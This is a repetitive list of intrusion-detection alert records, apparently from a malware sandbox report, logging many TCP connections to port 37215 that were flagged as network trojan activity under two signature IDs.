          SID:2835222
          Source Port:39052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289466
          SID:2835222
          Source Port:48272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168593
          SID:2835222
          Source Port:35530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986941
          SID:2829579
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538596
          SID:2829579
          Source Port:42518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.551580
          SID:2829579
          Source Port:43354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915051
          SID:2835222
          Source Port:59250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165540
          SID:2835222
          Source Port:51496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600898
          SID:2835222
          Source Port:40812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947230
          SID:2829579
          Source Port:41198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948172
          SID:2829579
          Source Port:50224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477593
          SID:2835222
          Source Port:59870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120537
          SID:2835222
          Source Port:54970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818833
          SID:2829579
          Source Port:59628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398832
          SID:2835222
          Source Port:39476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952329
          SID:2829579
          Source Port:52292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928712
          SID:2829579
          Source Port:33398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223791
          SID:2835222
          Source Port:37358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285621
          SID:2829579
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.271976
          SID:2829579
          Source Port:49384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079842
          SID:2829579
          Source Port:53412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290240
          SID:2835222
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645243
          SID:2829579
          Source Port:34338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945091
          SID:2829579
          Source Port:38972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929502
          SID:2829579
          Source Port:55188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819198
          SID:2835222
          Source Port:39406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168145
          SID:2835222
          Source Port:59492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916026
          SID:2835222
          Source Port:54958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158163
          SID:2829579
          Source Port:33420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928559
          SID:2829579
          Source Port:57936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103266
          SID:2829579
          Source Port:43702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993204
          SID:2829579
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646089
          SID:2835222
          Source Port:35094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411810
          SID:2829579
          Source Port:55274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269850
          SID:2835222
          Source Port:47860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715118
          SID:2835222
          Source Port:34944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286398
          SID:2829579
          Source Port:47486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720395
          SID:2835222
          Source Port:58694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225031
          SID:2829579
          Source Port:49784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860492
          SID:2829579
          Source Port:43900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165971
          SID:2835222
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028893
          SID:2835222
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246047
          SID:2835222
          Source Port:47550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038823
          SID:2829579
          Source Port:38468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400398
          SID:2835222
          Source Port:33298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399230
          SID:2829579
          Source Port:59166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252971
          SID:2835222
          Source Port:33020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132516
          SID:2835222
          Source Port:60078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163101
          SID:2835222
          Source Port:44480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944660
          SID:2829579
          Source Port:37370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991534
          SID:2829579
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914117
          SID:2829579
          Source Port:45908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206010
          SID:2835222
          Source Port:35656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305023
          SID:2835222
          Source Port:37158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923044
          SID:2829579
          Source Port:54858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986676
          SID:2835222
          Source Port:37072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988062
          SID:2829579
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823320
          SID:2835222
          Source Port:58818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721137
          SID:2829579
          Source Port:48222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284270
          SID:2829579
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014340
          SID:2835222
          Source Port:43514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298035
          SID:2829579
          Source Port:48182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226719
          SID:2835222
          Source Port:57930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930217
          SID:2835222
          Source Port:48630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283712
          SID:2835222
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560325
          SID:2829579
          Source Port:57006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247635
          SID:2835222
          Source Port:36900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249414
          SID:2829579
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945969
          SID:2835222
          Source Port:55374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600439
          SID:2829579
          Source Port:41284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103074
          SID:2835222
          Source Port:36948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222625
          SID:2835222
          Source Port:40792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646407
          SID:2829579
          Source Port:60060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718053
          SID:2829579
          Source Port:37220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159389
          SID:2835222
          Source Port:46474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164688
          SID:2829579
          Source Port:48474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713662
          SID:2829579
          Source Port:60022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419485
          SID:2835222
          Source Port:42352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869826
          SID:2829579
          Source Port:36244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948204
          SID:2829579
          Source Port:45410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414885
          SID:2835222
          Source Port:60966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033525
          SID:2835222
          Source Port:55434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034731
          SID:2829579
          Source Port:42940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207741
          SID:2835222
          Source Port:39954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642837
          SID:2835222
          Source Port:33004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538370
          SID:2835222
          Source Port:55986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947393
          SID:2829579
          Source Port:60296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687592
          SID:2829579
          Source Port:54378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413587
          SID:2829579
          Source Port:44428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952184
          SID:2829579
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227602
          SID:2835222
          Source Port:55940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950946
          SID:2829579
          Source Port:52804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558302
          SID:2835222
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822098
          SID:2829579
          Source Port:53682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168892
          SID:2829579
          Source Port:52616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418087
          SID:2829579
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597440
          SID:2829579
          Source Port:42698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540144
          SID:2829579
          Source Port:46108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567715
          SID:2829579
          Source Port:33482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821200
          SID:2835222
          Source Port:40916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715136
          SID:2835222
          Source Port:34996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399617
          SID:2835222
          Source Port:38518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464688
          SID:2835222
          Source Port:59446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714261
          SID:2835222
          Source Port:37920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272771
          SID:2829579
          Source Port:35214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274377
          SID:2829579
          Source Port:54424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537908
          SID:2829579
          Source Port:49518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004135
          SID:2829579
          Source Port:49144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119791
          SID:2835222
          Source Port:51546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034510
          SID:2835222
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925151
          SID:2835222
          Source Port:54846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568206
          SID:2835222
          Source Port:36568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.690064
          SID:2829579
          Source Port:53028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226021
          SID:2835222
          Source Port:50778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103027
          SID:2835222
          Source Port:46332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471679
          SID:2835222
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164668
          SID:2835222
          Source Port:55294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038545
          SID:2829579
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714432
          SID:2835222
          Source Port:38434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416303
          SID:2835222
          Source Port:49816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206888
          SID:2835222
          Source Port:38652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160409
          SID:2829579
          Source Port:43344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282502
          SID:2829579
          Source Port:33296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948738
          SID:2829579
          Source Port:39012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472440
          SID:2829579
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993302
          SID:2829579
          Source Port:51142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396656
          SID:2835222
          Source Port:33638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644120
          SID:2829579
          Source Port:51668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165267
          SID:2829579
          Source Port:40980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290475
          SID:2829579
          Source Port:50234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074977
          SID:2835222
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278784
          SID:2829579
          Source Port:42980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081160
          SID:2835222
          Source Port:57276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296904
          SID:2829579
          Source Port:37896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908904
          SID:2835222
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292811
          SID:2829579
          Source Port:51312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033850
          SID:2829579
          Source Port:50402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302107
          SID:2829579
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163826
          SID:2829579
          Source Port:37964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720760
          SID:2829579
          Source Port:58762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606985
          SID:2829579
          Source Port:36990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719726
          SID:2829579
          Source Port:33506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632495
          SID:2835222
          Source Port:36338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995670
          SID:2829579
          Source Port:47890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868850
          SID:2835222
          Source Port:41992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822512
          SID:2835222
          Source Port:40060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993610
          SID:2835222
          Source Port:57132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820508
          SID:2835222
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475760
          SID:2835222
          Source Port:46926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596398
          SID:2829579
          Source Port:57496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291303
          SID:2829579
          Source Port:60718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948938
          SID:2829579
          Source Port:39916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105276
          SID:2835222
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905936
          SID:2835222
          Source Port:47734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539031
          SID:2829579
          Source Port:60936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490295
          SID:2829579
          Source Port:34864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076526
          SID:2829579
          Source Port:51562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947339
          SID:2829579
          Source Port:47462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075463
          SID:2829579
          Source Port:46410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292302
          SID:2835222
          Source Port:33348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476924
          SID:2835222
          Source Port:50050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029434
          SID:2835222
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035082
          SID:2829579
          Source Port:43020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284857
          SID:2829579
          Source Port:46346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.639882
          SID:2829579
          Source Port:52106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222696
          SID:2829579
          Source Port:50660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223606
          SID:2835222
          Source Port:60200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162790
          SID:2835222
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017418
          SID:2835222
          Source Port:34210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250852
          SID:2835222
          Source Port:59090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412216
          SID:2829579
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606767
          SID:2829579
          Source Port:41950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226858
          SID:2829579
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987974
          SID:2829579
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417411
          SID:2829579
          Source Port:53076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929468
          SID:2829579
          Source Port:36798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222648
          SID:2829579
          Source Port:38250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867216
          SID:2829579
          Source Port:38696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860775
          SID:2835222
          Source Port:42818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078107
          SID:2835222
          Source Port:41630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166237
          SID:2829579
          Source Port:40930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645768
          SID:2829579
          Source Port:58724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821058
          SID:2835222
          Source Port:57424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947803
          SID:2829579
          Source Port:37754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821663
          SID:2829579
          Source Port:36596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820424
          SID:2829579
          Source Port:51214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719687
          SID:2835222
          Source Port:46918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285966
          SID:2835222
          Source Port:51312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490334
          SID:2829579
          Source Port:33096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718171
          SID:2835222
          Source Port:41556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717906
          SID:2829579
          Source Port:40482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694563
          SID:2829579
          Source Port:35844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946617
          SID:2829579
          Source Port:57558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418996
          SID:2835222
          Source Port:55404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718692
          SID:2835222
          Source Port:37774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865145
          SID:2835222
          Source Port:41022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282570
          SID:2829579
          Source Port:53736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990728
          SID:2835222
          Source Port:55494
          Destination Port:37215
